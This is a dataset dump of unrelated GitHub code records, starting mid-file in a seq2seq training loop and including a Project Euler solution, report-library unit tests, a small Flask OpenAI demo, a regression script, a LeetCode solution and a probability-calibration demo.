100, print_loss_avg))\n\n total_val_loss = 0\n total_val_pairs = len(val_sent_tensor_pairs)\n\n for itr in range(0, len(val_sent_tensor_pairs)):\n val_input_tensor = val_sent_tensor_pairs[itr][0]\n val_target_tensor = val_sent_tensor_pairs[itr][1]\n # print(\"Validation record: {0}\".format(itr))\n # print(val_sent_pairs[itr])\n val_loss = get_validation_loss(val_input_tensor, val_target_tensor, encoder, decoder, criterion)\n total_val_loss += val_loss\n\n avg_val_loss = total_val_loss / total_val_pairs\n val_losses.append(avg_val_loss)\n print('Validation loss: %s (%d %d%%) %.4f' % (timeSince(start, iter / n_iters),\n iter, iter / n_iters * 100, avg_val_loss))\n\n # mod P_ier\n if abs(avg_val_loss - prev_val_loss) > stopping_delta:\n print(f\"No improvement in validation loss, losing patience, saving model : {patience}\")\n encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n print('save encoder weights to ', encoder_save_path)\n torch.save(encoder.state_dict(), encoder_save_path)\n decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n print('save decoder weights to ', decoder_save_path)\n torch.save(decoder.state_dict(), decoder_save_path)\n\n patience -= 1\n\n if patience == 0: # break out of training\n break\n\n prev_val_loss = avg_val_loss\n # end mod Pier\n\n print(\"##########################################################\")\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n # # save trained encoder and decoder\n # if iter % save_every == 0:\n # encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n # print('save encoder weights to ', encoder_save_path)\n # torch.save(encoder.state_dict(), encoder_save_path)\n # decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n # print('save decoder weights to ', decoder_save_path)\n # torch.save(decoder.state_dict(), decoder_save_path)\n\n 
showPlot(plot_losses, 'train_plot.png')\n showPlot(val_losses, 'validation_plot.png')\n\n return plot_losses, val_losses","repo_name":"lppier/Seq2Seq_Eng2Indo-Translation","sub_path":"writing_stopping_criteria.py","file_name":"writing_stopping_criteria.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"70061108487","text":"from utils.primes import get_primes\n\n\ndef get_min_phi_ratio_perm(max_n: int) -> int:\n \"\"\"\n Get the values of 1 < n < 10^7 such that n and phi(n) are permutations and\n n/phi(n) is minimum.\n\n This is achieved when n = p1 * p2 for primes p1 and p2.\n Also, phi(p1 * p2) = (p1 - 1)(p2 - 1)\n \"\"\"\n # Obviously you won't know the search range 10^3 < p < 10^4 beforehand\n bounded_primes = [p for p in get_primes(max_n) if 10**3 < p < 10**4]\n len_primes = len(bounded_primes)\n\n sol_n = 0\n min_ratio = float(\"inf\")\n\n for i, p in enumerate(bounded_primes):\n for j in range(i + 1, len_primes):\n q = bounded_primes[j]\n n = p * q\n if n > 10000000:\n break\n phi = (p - 1) * (q - 1)\n ratio = n / phi\n if ratio < min_ratio and sorted(str(n)) == sorted(str(phi)):\n min_ratio = ratio\n sol_n = n\n return sol_n\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p070.py","file_name":"p070.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2490719421","text":"import unittest\nfrom tools import get_report_path\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom nuntiare.report import Report\nimport nuntiare.definition.functions as fn\n\n\nclass AggregateTest(unittest.TestCase):\n def test_aggregate(self):\n '''\n Test a simple table (Tablix with just a TablixBody)\n and aggregates Count, RunningValue, RowNumber, and\n Sum in diferent contexts.\n Test Grouping and sorting too.\n '''\n report = Report(get_report_path('northwind_orders.xml'))\n\n con_file_info = open(\"db_test_connection_northwind\", \"r\")\n conn_str = con_file_info.readline()\n con_file_info.close()\n\n parameters = {\n 'conn_string': conn_str,\n 'query_limit': 100,\n }\n report.run(parameters)\n\n grid = report.result.body.items.item_list[0].grid_body\n\n self.assertEqual(self._cell_value(grid, 0, 2), 'Product')\n self.assertEqual(self._cell_value(grid, 0, 11), 'Running Avg')\n\n # Austria\n self._ckeck_country_header(\n grid, 1, 7, 1, 'Austria', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_customer_header(\n grid, 2, 1, 'Ernst Handel', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_order_header(grid, 3, 1, 10258)\n self._ckeck_order_line(\n grid, 4, 1, 'Chang', 50.0,\n 15.2, 760.0, 0.2, 152.0, 608.0, 1, 608.0, 608.0, 1)\n self._ckeck_order_line(\n grid, 6, 3, 'Mascarpone Fabioli', 6.0,\n 25.6, 153.6, 0.2, 30.72, 122.88, 3, 1614.88, 538.29, 3)\n self._ckeck_order_footer(\n grid, 7, 3, 3, 3, 2018.6, 4483.4, 4483.4,\n 1614.88, 1614.88, 1614.88, 10258)\n self._ckeck_order_header(grid, 8, 2, 10263)\n self._ckeck_order_line(\n grid, 10, 5, 'Longlife Tofu', 36.0,\n 8.0, 288.0, 0.25, 72.0, 216.0, 2, 316.8, 158.4, 5)\n self._ckeck_order_line(\n grid, 12, 7, 'Pavlova', 60.0,\n 13.9, 834.0, 0.25, 208.50, 625.5, 4, 1873.8, 468.45, 7)\n self._ckeck_order_footer(\n grid, 13, 4, 7, 7, 2464.8, 4483.4, 4483.4,\n 1873.8, 3488.68, 3488.68, 10263)\n\n # Brazil\n self._ckeck_country_header(\n grid, 21, 20, 3, 'Brazil', 229.0,\n 4223.6, 260.4, 3963.2, 10, 3963.2, 396.32)\n self._ckeck_customer_header(\n grid, 22, 1, 'Hanari Carnes', 162.00,\n 3257.8, 260.4, 2997.4, 6, 2997.4, 499.57)\n self._ckeck_order_header(grid, 23, 1, 10250)\n self._ckeck_order_line(\n grid, 24, 11, \"Jack's New England Clam Chowder\", 10.0,\n 7.7, 77.0, 0.0, 0.0, 77.0, 1, 77.0, 77.0, 11)\n self._ckeck_order_line(\n grid, 26, 13, \"Manjimup Dried Apples\", 35.0,\n 42.4, 1484.0, 0.15, 222.6, 1261.4, 3, 1552.6, 517.53, 13)\n self._ckeck_order_footer(\n grid, 27, 3, 3, 3, 1813.0, 3257.8, 4223.6,\n 1552.6, 1552.6, 1552.6, 10250)\n self._ckeck_order_footer(\n grid, 32, 3, 6, 6, 1444.8, 3257.8, 4223.6,\n 1444.8, 2997.4, 2997.4, 10253)\n self._ckeck_customer_header(\n grid, 33, 2, 'Que Delícia', 40.0,\n 448.0, 0.0, 448.0, 2, 448.0, 224.0)\n self._ckeck_order_footer(\n grid, 37, 2, 2, 8, 448.0, 448.0, 4223.6,\n 448.0, 448.0, 3445.4, 10261)\n self._ckeck_customer_header(\n grid, 38, 3, \"Wellington Importadora\", 27.0,\n 517.8, 0.0, 517.8, 2, 517.8, 258.9)\n self._ckeck_order_line(\n grid, 41, 20, \"Perth Pasties\", 15.0,\n 26.2, 393.0, 0.0, 0.0, 393.0, 2, 517.8, 258.9, 20)\n self._ckeck_order_footer(\n grid, 42, 2, 2, 10, 517.8, 517.8, 4223.6,\n 517.8, 517.8, 3963.2, 10256)\n\n # Venezuela\n self._ckeck_country_header(\n grid, 200, 100, 13, 'Venezuela', 136.0,\n 3635.9, 0.0, 3635.9, 9, 3635.9, 403.99)\n self._ckeck_customer_header(\n grid, 201, 1, \"GROSELLA-Restaurante\", 14.0,\n 1101.2, 0.0, 1101.2, 2, 1101.2, 550.6)\n 
self._ckeck_order_line(\n grid, 203, 92, \"Mozzarella di Giovanni\", 4.0,\n 27.8, 111.2, 0.0, 0.0, 111.2, 1, 111.2, 111.2, 92)\n self._ckeck_order_footer(\n grid, 205, 2, 2, 2, 1101.2, 1101.2, 3635.9,\n 1101.2, 1101.2, 1101.2, 10268)\n self._ckeck_order_footer(\n grid, 218, 4, 4, 9, 1414.8, 1414.8, 3635.9,\n 1414.8, 1414.8, 3635.9, 10283)\n\n def _ckeck_order_footer(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n self.assertEqual(round(self._cell_value(grid, row, 4), 2), v4)\n # Sum('F.subtotal1', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # Sum('F.subtotal1', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 6), 2), v6)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 9), 2), v9)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 10), v10)\n\n def _ckeck_order_line(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12):\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # F.product\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # F.quantity\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # F.unitprice\n self.assertEqual(self._cell_value(grid, row, 4), v4)\n # F.subtotal1\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # F.discount\n self.assertEqual(self._cell_value(grid, row, 6), v6)\n # F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # F.subtotal1 - F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 9), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v10)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v11)\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 12), v12)\n\n def _ckeck_order_header(self, grid, row, v1, v2):\n # RunningValue('F.orderid','CountDistinct','customer')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n\n def _ckeck_customer_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9):\n # RunningValue('F.customer', 'CountDistinct', 'country')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.customer\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # Sum('F.quantity')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v4)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v5)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v6)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 9), v7)\n # 
RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v9)\n\n def _ckeck_country_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber() in Tablix contexts (Counting countries)\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # RunningValue('F.country', 'CountDistinct')\n self.assertEqual(self._cell_value(grid, row, 1), v2)\n # F.country\n self.assertEqual(self._cell_value(grid, row, 2), v3)\n # Sum('F.quantity')\n self.assertEqual(self._cell_value(grid, row, 3), v4)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v5)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v6)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v7)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 9), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v10)\n\n def _cell_value(self, grid, row, column):\n cell = grid.get_cell(row, column)\n return cell.object.item_list[0].value\n\n def test_functions(self):\n # Conversion functions\n self.assertEqual(fn.CBool('true'), True)\n self.assertEqual(fn.CBool('t'), True)\n\n self.assertEqual(\n fn.CDate('20151231'), datetime(2015, 12, 31, 0, 0, 0))\n self.assertEqual(\n fn.CDate('20151231 23:59:59'), datetime(2015, 12, 31, 23, 59, 59))\n\n self.assertEqual(fn.CInt('1'), 1)\n self.assertEqual(fn.CInt(1.1), 1)\n\n self.assertEqual(fn.CFloat('1.1'), 1.1)\n self.assertEqual(fn.CInt(fn.CFloat('1.1')), 1)\n\n self.assertEqual(fn.CDecimal('1.1'), Decimal('1.1'))\n self.assertEqual(fn.CDecimal(1.1), Decimal(1.1))\n\n self.assertEqual(fn.CStr(1.1), '1.1')\n self.assertEqual(fn.CStr(True), 'True')\n self.assertEqual(\n fn.CStr(datetime(2015, 12, 31, 0, 0, 0)), '2015-12-31 00:00:00')\n\n # Conditional functions\n self.assertEqual(fn.Iif(True, 'a', 'b'), 'a')\n self.assertEqual(fn.Iif(False, 'a', 'b'), 'b')\n self.assertEqual(fn.Iif(None, 'a', 'b'), 'b')\n\n self.assertEqual(fn.Switch(0, 0, 'a', 1, 'b', 2, 'c'), 'a')\n self.assertEqual(fn.Switch(1, 0, 'a', 1, 'b', 2, 'c'), 'b')\n self.assertEqual(fn.Switch(2, 0, 'a', 1, 'b', 2, 'c'), 'c')\n\n self.assertEqual(fn.Choose(1, 'a', 'b', 'c'), 'a')\n self.assertEqual(fn.Choose(2, 'a', 'b', 'c'), 'b')\n self.assertEqual(fn.Choose(3, 'a', 'b', 'c'), 'c')\n\n # Date funtions\n self.assertEqual(fn.Day(datetime(2015, 12, 31, 23, 15, 49)), 31)\n self.assertEqual(fn.Month(datetime(2015, 12, 31, 23, 15, 49)), 12)\n self.assertEqual(fn.Year(datetime(2015, 12, 31, 23, 15, 49)), 2015)\n self.assertEqual(fn.Hour(datetime(2015, 12, 31, 23, 15, 49)), 23)\n self.assertEqual(fn.Minute(datetime(2015, 12, 31, 23, 15, 49)), 15)\n self.assertEqual(fn.Second(datetime(2015, 12, 31, 23, 15, 49)), 49)\n self.assertEqual(fn.Day(fn.Today()), fn.Day(datetime.today()))\n\n # String funtions\n self.assertEqual(fn.Format('Hello', 'Hello'), 'Hello')\n self.assertEqual(fn.Format('World!', 'Hello {0}'), 'Hello World!')\n self.assertEqual(fn.Format(12, '{:,.2f}'), '12.00')\n\n self.assertEqual(fn.LCase('To Lower'), 'to lower')\n self.assertEqual(fn.LCase(None), None)\n 
self.assertEqual(fn.UCase('To Upper'), 'TO UPPER')\n self.assertEqual(fn.UCase(None), None)\n self.assertEqual(fn.Len(''), 0)\n self.assertEqual(fn.Len('Get Lenght'), 10)\n self.assertEqual(fn.Len(None), None)\n self.assertEqual(fn.LTrim(''), '')\n self.assertEqual(fn.LTrim(' '), '')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim('LTrim '), 'LTrim ')\n self.assertEqual(fn.RTrim(''), '')\n self.assertEqual(fn.RTrim(' '), '')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim(' RTrim'), ' RTrim')\n self.assertEqual(fn.Trim(''), '')\n self.assertEqual(fn.Trim(' '), '')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n\n mid_test = 'Mid Function Demo'\n self.assertEqual(fn.Mid(mid_test, 1, 3), 'Mid')\n self.assertEqual(fn.Mid(mid_test, 14, 4), 'Demo')\n self.assertEqual(fn.Mid(mid_test, 5), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 5, 150), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 150), '')\n\n replace_test = 'abc def abc hij klm'\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx'), 'xxx def xxx hij klm')\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx', 1), 'xxx def abc hij klm')\n\n self.assertEqual(fn.String(5, 'x'), 'xxxxx')\n self.assertEqual(fn.String(0, 'x'), '')\n\n # Test functions in report\n\n report = Report(self._get_functios_xml())\n report.run()\n\n def _get_functios_xml(self):\n return r'''\n\n Functions tests\n \n \n \n \n grid_functions\n \n \n \n \n \n \n \n \n \n \n \n \n \n 5mm\n \n \n 5mm\n \n \n \n \n 5mm\n \n \n \n \n \n cbool\n =CBool('true')\n \n \n \n \n \n \n \n \n cfloat\n =CFloat('1.99')\n \n \n \n \n \n \n \n \n \n \n \n\n'''\n","repo_name":"formateli/nuntiare","sub_path":"tests/unittest/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":15683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72991219527","text":"'''\nCreate a flask app that has a textbox and a button. When the button is clicked, the text in the textbox is sent to the OpenAI API and the response is displayed on the page.\n'''\nfrom flask import Flask, render_template, request\nfrom gpt import GPT, Example\nimport openai\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n prompt = request.form['prompt']\n openai.api_key = \"\"\n gpt = GPT(engine=\"davinci\", temperature=0.5, max_tokens=100)\n output = gpt.submit_request(prompt)\n return render_template('index.html', output=output.choices[0].text)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Tominium/GPT3-Sandbox","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"21359318333","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 1 13:36:23 2022\r\n\r\n@author: ramav\r\n\"\"\"\r\n#SIMPLE LINEAR REGREESSION\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\ndf.isnull().sum()\r\n\r\n\r\nx = df.iloc[:,:1].values\r\ny = df.iloc[:,-1].values\r\n\r\n#EDA\r\nplt.scatter(x, y, color=\"red\")\r\nplt.title(\" relation between salary and experience\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nplt.boxplot(x)\r\nplt.show()\r\nplt.hist(x)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.25,random_state=0)\r\nx_train.shape\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train, y_train)\r\n\r\n#knowing Bo(inrecept) and B1 value(coefficient)\r\nLR.intercept_.round(3) #Bo\r\nLR.coef_.round(3) #B1\r\n\r\n\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_test = LR.predict(x_test)\r\n\r\ny_pred_train\r\ny_pred_test\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y_train,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_train,y_pred_train).round(2)*100) #96\r\n\r\n\r\nmse1 = mean_squared_error(y_test,y_pred_test)\r\nRMSE1= np.sqrt(mse1)\r\nprint(\"Root mean square :\", RMSE1.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_test,y_pred_test).round(2)*100)\r\n\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_train,y_pred_train,color=\"red\")\r\nplt.title(\"training scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_test,y_pred_test,color=\"red\")\r\nplt.title(\"test scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\n# x and y variable\r\nx = df[\"YearsExperience\"]\r\ny = df[\"Salary\"]\r\n\r\n\r\n#split as train and test\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.30,random_state=42)\r\n\r\nx_train.shape\r\n\r\n#scatter plot between x and y\r\ndf.plot(kind=\"scatter\",x=\"YearsExperience\",y=\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x,y,color=\"red\",edgecolors=\"orange\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#box plot to know outliers\r\ndf.plot(kind=\"box\")\r\nplt.show()\r\n\r\ndf.corr()\r\n\r\n# Dataframe\r\nx_train = pd.DataFrame(x_train)\r\ny_train= pd.DataFrame(y_test)\r\n\r\nx_ test= pd.DataFrame(x_test)\r\ny_test= pd.DataFrame(y_test)\r\n\r\n\r\n\r\n# model fitting\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train,y_train)\r\n\r\n#knowing Bo(inrecept) and B1 
value(coefficient)\r\n\r\nLR.intercept_.round(3)\r\nLR.coef_.round(3)\r\n\r\nLR.score(x,y).round(3)\r\n\r\n#prediction\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_train\r\n\r\ny_pred_test = LR.predict(x_test)\r\ny_pred_test\r\n\r\n#comparsion between y actual and y_pred by using scatter plot\r\nplt.scatter(x=x.iloc[:,0],y=y,color=\"red\")\r\nplt.plot(x.iloc[:,0], y_pred_train,color=\"blue\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"salary\")\r\nplt.show()\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2))\r\n\r\nprint(\"R square:\",r2_score(y,y_pred).round(2)*100)\r\n\r\n'''\r\n","repo_name":"ajithsinghr/Build-a-prediction-model-for-salary-hike-Simple-linear-regression","sub_path":"solved Sal_data.py","file_name":"solved Sal_data.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5109464108","text":"class Solution(object):\n def anagramMappings(self, A, B):\n \"\"\"\n :type A: List[int]\n :type B: List[int]\n :rtype: List[int]\n \"\"\"\n dic = {}\n \n for i,n in enumerate(B):\n dic.setdefault(n, []).append(i)\n \n \n return [dic.get(n).pop(0) for n in A]\n","repo_name":"simonzg/leetcode-solutions","sub_path":"760.Find_Anagram_Mappings.py","file_name":"760.Find_Anagram_Mappings.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20984391504","text":"# Python3\n# Create date: 2023-06-15\n# Author: Scc_hy\n# Func: 保序回归\n# ==============================================================================================\n\n# calibration_curve PLOT\n# -------------------------------\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.calibration import calibration_curve\nnp.random.seed(2023)\n\n\ny_true = np.random.randint(0, 2, size=1000)\ny_pred = np.random.binomial(n=200, p=0.19, size=1000)\ny_pred = (y_pred - y_pred.min())/(y_pred.max()-y_pred.min())\ny_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n)\n\n# 分割图片 2:1\nfig = plt.figure(constrained_layout=True, figsize=(16, 4))\ngs = fig.add_gridspec(1, 3)\naxes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n# 绘制分布\nsns.histplot(y_pred, alpha=0.7, ax=axes1)\nfor i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\naxes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\naxes1.set_xlabel('Predicted probability')\n# 绘制对准曲线\naxes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\naxes2.plot(proba_means, y_means, linestyle='-.')\naxes2.set_title('Simplr Predict Calibrator')\naxes2.legend()\naxes2.set_xlabel(\"Bin's mean of predicted probability\")\naxes2.set_ylabel(\"Bin's mean of target variable\")\nplt.show()\n\n\ndef quick_calibration_plot(y_true, y_pred, title_msg=''):\n y_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n )\n # 分割图片 2:1\n fig = plt.figure(constrained_layout=True, figsize=(16, 4))\n gs = fig.add_gridspec(1, 3)\n axes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n # 绘制分布\n sns.histplot(y_pred, alpha=0.7, ax=axes1)\n for i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\n axes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\n axes1.set_xlabel('Predicted probability')\n # 绘制对准曲线\n axes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\n axes2.plot(proba_means, y_means, linestyle='-.')\n axes2.set_title(f'Simple Predict Calibrator\\n{title_msg}')\n axes2.legend()\n axes2.set_xlabel(\"Bin's mean of predicted probability\")\n axes2.set_ylabel(\"Bin's mean of target variable\")\n plt.show()\n \n\n# 校准试验\n# -------------------------------\ndef expected_calibration_error(y, proba, bins = 'fd'):\n bin_count, bin_edges = np.histogram(proba, bins = bins)\n n_bins = len(bin_count)\n bin_edges[0] -= 1e-8 # because left edge is not included\n bin_id = np.digitize(proba, bin_edges, right = True) - 1\n bin_ysum = np.bincount(bin_id, weights = y, minlength = n_bins)\n bin_probasum = np.bincount(bin_id, weights = proba, minlength = n_bins)\n bin_ymean = np.divide(bin_ysum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n bin_probamean = np.divide(bin_probasum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n ece = np.abs((bin_probamean - bin_ymean) * bin_count).sum() / len(proba)\n return ece\n\n\n# 模型简单拟合\nfrom sklearn.datasets import make_classification\nfrom sklearn.isotonic import IsotonicRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nX, y = make_classification(\n n_samples = 15000, \n n_features = 50, \n n_informative = 30, \n n_redundant = 20,\n weights = [.9, .1],\n random_state = 0\n)\nX_train, X_valid, X_test = X[:5000], X[5000:10000], 
X[10000:]\ny_train, y_valid, y_test = y[:5000], y[5000:10000], y[10000:]\nforest = RandomForestClassifier().fit(X_train, y_train)\nproba_valid = forest.predict_proba(X_valid)[:, 1]\n\n# 保序回归\niso_reg = IsotonicRegression(y_min = 0, y_max = 1, out_of_bounds = 'clip').fit(proba_valid, y_valid)\ntest_pred = forest.predict_proba(X_test)[:, 1]\nece_org = expected_calibration_error(y_test, test_pred, bins = 'fd')\nquick_calibration_plot(y_test, test_pred, title_msg=f'not calibration ECE={ece_org:.3f}')\n\nproba_test_forest_isoreg = iso_reg.predict(test_pred)\nece_iosreg = expected_calibration_error(y_test, proba_test_forest_isoreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_isoreg, title_msg=f'IsotonicRegression ECE={ece_iosreg:.3f}')\n\n# logistic\nlog_reg = LogisticRegression().fit(proba_valid.reshape(-1, 1), y_valid)\nproba_test_forest_logreg = log_reg.predict_proba(test_pred.reshape(-1, 1))[:, 1]\n\nece_logreg = expected_calibration_error(y_test, proba_test_forest_logreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_logreg, title_msg=f'IsotonicRegression ECE={ece_logreg:.3f}')","repo_name":"scchy/CSDN","sub_path":"保序回归New.py","file_name":"保序回归New.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
